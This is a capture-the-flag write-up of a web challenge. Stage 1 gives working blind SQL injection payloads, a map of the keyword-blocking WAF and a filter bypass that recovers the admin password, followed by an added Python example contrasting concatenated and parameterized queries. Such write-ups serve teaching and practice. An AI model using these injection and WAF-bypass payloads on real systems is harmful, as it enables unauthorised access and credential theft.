Tags: web sqli 

Rating:

# ▼▼▼RuAdmin (1000 points, 2/123 = 1.6%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

## ▼Stage1: Blind SQL injection

### 【Identify the vulnerability】

POST `/sessions`

`username`=**'or'1'='0'#**&`password`=test   ⇒Login failed

`username`=**'or'1'='1'#**&`password`=test   ⇒Login success

**Blind SQL injection !!**

The challenge also stated that you should log in with `admin`'s authority, and a successful login redirects to `/admin`.

`/admin` has its own login form, but **no vulnerability.**

---

### 【Attack scenario】

I will extract admin's login information with blind SQL injection at `/sessions`, then log in at `/admin`.

---

### 【Identify the Database】

`username`=**'or''=''--**&`password`=test ⇒ 500 error

`username`=**'or''=''--+**&`password`=test ⇒ Login success

**MySQL !!** (In MySQL a `--` comment needs a following whitespace character, so the bare `--` breaks the query while `--+`, which decodes to `-- `, works.)

---

### 【Identify the WAF】

```
username=like&password=a ⇒hacking detected( `like`)
username=REGEXP&password=s ⇒hacking detected( `regexp`)
username=mid&password=s ⇒hacking detected( `mid`)
username=STRCMP&password=s ⇒hacking detected( `STRCMP`)
username=INSTR&password=s ⇒hacking detected( `INSTR`)
username=POSITION&password=s     ⇒hacking detected( `POSITION`)
username=LOCATE&password=s ⇒hacking detected( `LOCATE`)
username=LPAD&password=s ⇒hacking detected( `LPAD`)
username=concat&password=s ⇒hacking detected( `concat`)
username=substr&password=s ⇒hacking detected( `substr`)
username=hex&password=s ⇒hacking detected( `hex`)
username=right&password=s ⇒hacking detected( `right`)
username=left&password=s ⇒hacking detected( `left`)
username=ascii&password=s ⇒hacking detected( `ascii`)
username=conv&password=s ⇒hacking detected( `conv`)
username=and&password=s   ⇒hacking detected( `and`)
username=information_schema.tables&password=s   ⇒hacking detected( `information_schema.tables`)
```

These keywords are blocked by the WAF.

---

```
username=or&password=s ⇒username or password is invalid (I can use `or`)
username=in&password=s ⇒username or password is invalid (I can use `in`)
username=if&password=s ⇒username or password is invalid (I can use `if`)
username=length&password=s ⇒username or password is invalid (I can use `length`)
username=ord&password=s ⇒username or password is invalid (I can use `ord`)
username=%26%26&password=s ⇒username or password is invalid (I can use `&&`: Substitution of `and`)
```

These pass the WAF, so they can be used in the injection.

---

### 【Identify the number of data】

`username`='or id=0# ⇒ Login success!!

`username`='or id=1# ⇒ Login success!!

`username`='or id=2# ⇒ Login failed!!

`username`='or id>2# ⇒ Login failed!!

2 rows !!

---

### 【Identify column names】

`username`='or+length(username)>1# ⇒Login success( `username`!!)

`username`='or+length(password)>1# ⇒Login success( `password`!!)

---

### 【Identify admin's username】

`username`='or id=1%26%26username='admin'#    ⇒Login success(id=1 is `admin`)

---

### 【Identify admin's password】

`username`='or+id=1%26%26length(password)=13#   ⇒ Login success (admin's password is 13 characters)

`username`='or+id=1%26%26ord(password)=73#    ⇒ `I`

`username`='or+id=1%26%26ord(ltrim(replace(password,'I','')))=95#   ⇒ `_`

... (abridged) ...

`username`='or+id=1%26%26ord(ltrim(replace(password,'I_l0v3_Applz','')))=95#  ⇒ `_`

admin's password is `I_l0v3_Applz_`

---

### 【Login at /admin】

`username`=admin&`password`=I_l0v3_Applz_ ⇒Login success
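The following is an added example, not code from the original writeup or from the challenge: it models the `/sessions` login check in the two shapes that matter here, string-concatenated SQL (the shape the payloads above imply) and a parameterized query, and runs the writeup's probe strings through a keyword-blocklist WAF like the one fingerprinted in the "Identify the WAF" section. It uses an in-memory SQLite database so it runs offline; the real target was MySQL, so the MySQL-only `#` comment and `&&` operator are only checked against the blocklist, not executed, and the `--` form from the database-fingerprinting step is used for the executed payloads. The table contents, the `guest` row, and the whole-word matching behaviour of the WAF are constructed assumptions.

```python
"""Added example (not part of the writeup): vulnerable vs. parameterized
login query, plus the keyword blocklist the writeup observed."""
import re
import sqlite3

# Tokens the writeup found to be rejected with "hacking detected".
WAF_BLOCKLIST = [
    "like", "regexp", "mid", "strcmp", "instr", "position", "locate",
    "lpad", "concat", "substr", "hex", "right", "left", "ascii", "conv",
    "and", "information_schema.tables",
]


def waf_blocks(value: str) -> bool:
    """True when the naive keyword WAF would reject this value.
    Assumption: whole-word, case-insensitive matching."""
    lowered = value.lower()
    return any(
        re.search(r"(?<![a-z0-9_])" + re.escape(tok) + r"(?![a-z0-9_])", lowered)
        for tok in WAF_BLOCKLIST
    )


def connect() -> sqlite3.Connection:
    """Constructed users table mirroring what the writeup enumerated:
    two rows (id 0 and 1), admin at id=1 with the recovered password.
    Plaintext passwords are kept only to mirror the challenge's schema."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(0, "guest", "guest-password-constructed"), (1, "admin", "I_l0v3_Applz_")],
    )
    return db


def login_concatenated(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable shape: user input is spliced into the SQL text, so a
    quote in `username` ends the literal and the rest becomes SQL."""
    sql = (
        f"SELECT id FROM users WHERE username='{username}' "
        f"AND password='{password}'"
    )
    return db.execute(sql).fetchone() is not None


def login_parameterized(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened shape: placeholders keep the input as data, whatever it
    contains, so no blocklist is needed for correctness."""
    row = db.execute(
        "SELECT id FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


def probe_results() -> dict:
    """Runs the writeup's observations against both login shapes."""
    db = connect()
    # Executed payloads (SQLite-compatible '--' comment form).
    executed = {
        "true-or": "'or''=''--",
        "id-1": "'or id=1--",
        "id-2": "'or id=2--",
    }
    # MySQL-only payload from the password step, checked against the WAF only.
    mysql_probe = "'or id=1&&ord(ltrim(replace(password,'I','')))=95#"
    return {
        "concatenated": {k: login_concatenated(db, v, "test") for k, v in executed.items()},
        "parameterized": {k: login_parameterized(db, v, "test") for k, v in executed.items()},
        "waf_blocks_and": waf_blocks("and"),
        "waf_blocks_substr": waf_blocks("substr"),
        "waf_passes_mysql_probe": not waf_blocks(mysql_probe),
        "real_admin_login": login_parameterized(db, "admin", "I_l0v3_Applz_"),
    }


if __name__ == "__main__":
    for key, value in probe_results().items():
        print(f"{key}: {value}")
```

The blocklist rejects `and`, `substr` and `ascii` but lets the `&&`/`ord`/`ltrim`/`replace` probe through untouched, which is why the writeup could still extract the password one character at a time; against the parameterized query the same strings simply fail to match any row. One caveat on the `replace(password, known, '')` trick itself: `replace` strips every occurrence of the known prefix, not just the leading one, so if the prefix recurs later in the secret the "next character" reading is off by that many characters.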

---

## ▼Stage2: Rails Asset Pipeline Directory Traversal Vulnerability (CVE-2018-3760)

### 【function】

There is an upload function, and the upload folder path is displayed.

---

I could not solve stage 2...

I look forward to someone else's writeup.